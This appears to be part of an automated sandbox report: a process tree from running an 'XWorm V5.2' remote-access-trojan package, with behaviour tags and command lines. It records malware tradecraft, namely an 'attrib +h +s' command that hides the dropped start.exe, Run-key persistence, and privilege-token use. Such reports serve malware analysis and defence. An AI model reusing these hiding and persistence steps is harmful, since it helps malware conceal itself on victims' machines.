  attrib +h +s "C:\Users\Admin\Downloads\XWorm V5.2\start.exe"
  2⤵
  - Views/modifies file attributes
  PID:3872

C:\Users\Admin\Downloads\XWorm V5.2\XWorm V5.2.exe
"C:\Users\Admin\Downloads\XWorm V5.2\XWorm V5.2.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:5612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\XWorm V5.2\start.bat" "
1⤵
PID:4456
- C:\Users\Admin\Downloads\XWorm V5.2\start.exe
  start.exe
  2⤵
  - Adds Run key to start application
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:6108
- - C:\Windows\system32\attrib.exe
    attrib +h +s "C:\Users\Admin\Downloads\XWorm V5.2\start.exe"
    3⤵
    - Views/modifies file attributes
    PID:3784
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\XWorm V5.2\start.bat" "
1⤵
PID:2072
- C:\Users\Admin\Downloads\XWorm V5.2\start.exe
  start.exe
  2⤵
  - Adds Run key to start application
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:5600
- - C:\Windows\system32\attrib.exe
    attrib +h +s "C:\Users\Admin\Downloads\XWorm V5.2\start.exe"
    3⤵
    - Views/modifies file attributes
    PID:208
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:5720

C:\Users\Admin\Downloads\XWorm V5.2\XWormLoader 5.2 x32.exe
"C:\Users\Admin\Downloads\XWorm V5.2\XWormLoader 5.2 x32.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:5136

C:\Users\Admin\Downloads\XWorm V5.2\XWorm V5.2.exe
"C:\Users\Admin\Downloads\XWorm V5.2\XWorm V5.2.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:6044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/XCoderTools
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1072
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffabc4546f8,0x7ffabc454708,0x7ffabc454718
    3⤵
    PID:4512
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2200,17793269170712382294,6015394798290940497,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2248 /prefetch:2
    3⤵
    PID:3968
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2200,17793269170712382294,6015394798290940497,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5940
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2200,17793269170712382294,6015394798290940497,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2968 /prefetch:8
    3⤵
    PID:1092
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,17793269170712382294,6015394798290940497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
    3⤵
    PID:672
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,17793269170712382294,6015394798290940497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
    3⤵
    PID:2752
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,17793269170712382294,6015394798290940497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4780 /prefetch:1
    3⤵
    PID:4292
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/XCoderTools
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:5760
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xd8,0x114,0x7ffabc4546f8,0x7ffabc454708,0x7ffabc454718
    3⤵
    PID:2056
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,9050474192271358568,16992261202974541160,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2
    3⤵
    PID:4524
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,9050474192271358568,16992261202974541160,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4288
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,9050474192271358568,16992261202974541160,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2860 /prefetch:8
    3⤵
    PID:5844
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,9050474192271358568,16992261202974541160,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
    3⤵
    PID:6128
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,9050474192271358568,16992261202974541160,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
    3⤵
    PID:4816
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,9050474192271358568,16992261202974541160,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:1
    3⤵
    PID:3412

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5600

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5448

C:\Users\Admin\Downloads\XWorm V5.2\XWormLoader 5.2 x32.exe
"C:\Users\Admin\Downloads\XWorm V5.2\XWormLoader 5.2 x32.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:532

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:2296

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2772

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4912

C:\Users\Admin\Downloads\XWorm V5.2\XWorm V5.2.exe
"C:\Users\Admin\Downloads\XWorm V5.2\XWorm V5.2.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/XCoderTools
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  PID:3404
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xe0,0x108,0x7ffabc4546f8,0x7ffabc454708,0x7ffabc454718
    3⤵
    PID:1956
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,4338222721228449790,15106701911838306844,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2240 /prefetch:2
    3⤵
    PID:5772
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2232,4338222721228449790,15106701911838306844,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5892
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2232,4338222721228449790,15106701911838306844,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3012 /prefetch:8
    3⤵
    PID:5000
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4338222721228449790,15106701911838306844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
    3⤵
    PID:5044
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4338222721228449790,15106701911838306844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
    3⤵
    PID:6084
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4338222721228449790,15106701911838306844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1
    3⤵
    PID:3196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/XCoderTools
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  PID:4356
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffabc4546f8,0x7ffabc454708,0x7ffabc454718
    3⤵
    PID:3592
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,9059313952618841761,6510980019454456911,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2
    3⤵
    PID:5480
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,9059313952618841761,6510980019454456911,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4216
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,9059313952618841761,6510980019454456911,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2836 /prefetch:8
    3⤵
    PID:1628
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,9059313952618841761,6510980019454456911,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3564 /prefetch:1
    3⤵
    PID:3452
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,9059313952618841761,6510980019454456911,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:1
    3⤵
    PID:908
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,9059313952618841761,6510980019454456911,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:1
    3⤵
    PID:5932
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,9059313952618841761,6510980019454456911,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5272 /prefetch:8
    3⤵
    PID:6056
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,9059313952618841761,6510980019454456911,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5272 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/XCoderTools
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  PID:2968
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffabc4546f8,0x7ffabc454708,0x7ffabc454718
    3⤵
    PID:5196
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,4745142555943067456,16638155886665018727,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
    3⤵
    PID:5456
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,4745142555943067456,16638155886665018727,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1824
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,4745142555943067456,16638155886665018727,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:8
    3⤵
    PID:2348
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4745142555943067456,16638155886665018727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
    3⤵
    PID:956
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4745142555943067456,16638155886665018727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
    3⤵
    PID:5432
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4745142555943067456,16638155886665018727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:1
    3⤵
    PID:3192

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5176

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6076

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3484

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4580

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5948

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4564

C:\Users\Admin\Downloads\XWorm V5.2\XWormLoader 5.2 x32.exe
"C:\Users\Admin\Downloads\XWorm V5.2\XWormLoader 5.2 x32.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:1084

C:\Users\Admin\Downloads\XWorm V5.2\XWorm V5.2.exe
"C:\Users\Admin\Downloads\XWorm V5.2\XWorm V5.2.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:5224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/XCoderTools
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  PID:4216
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffabc4546f8,0x7ffabc454708,0x7ffabc454718
    3⤵
    PID:1628
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,14347994709960295445,15543057053867516141,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:2
    3⤵
    PID:4832
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2036,14347994709960295445,15543057053867516141,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2516 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1624
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2036,14347994709960295445,15543057053867516141,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2880 /prefetch:8
    3⤵
    PID:6012
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,14347994709960295445,15543057053867516141,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:1
    3⤵
    PID:3848
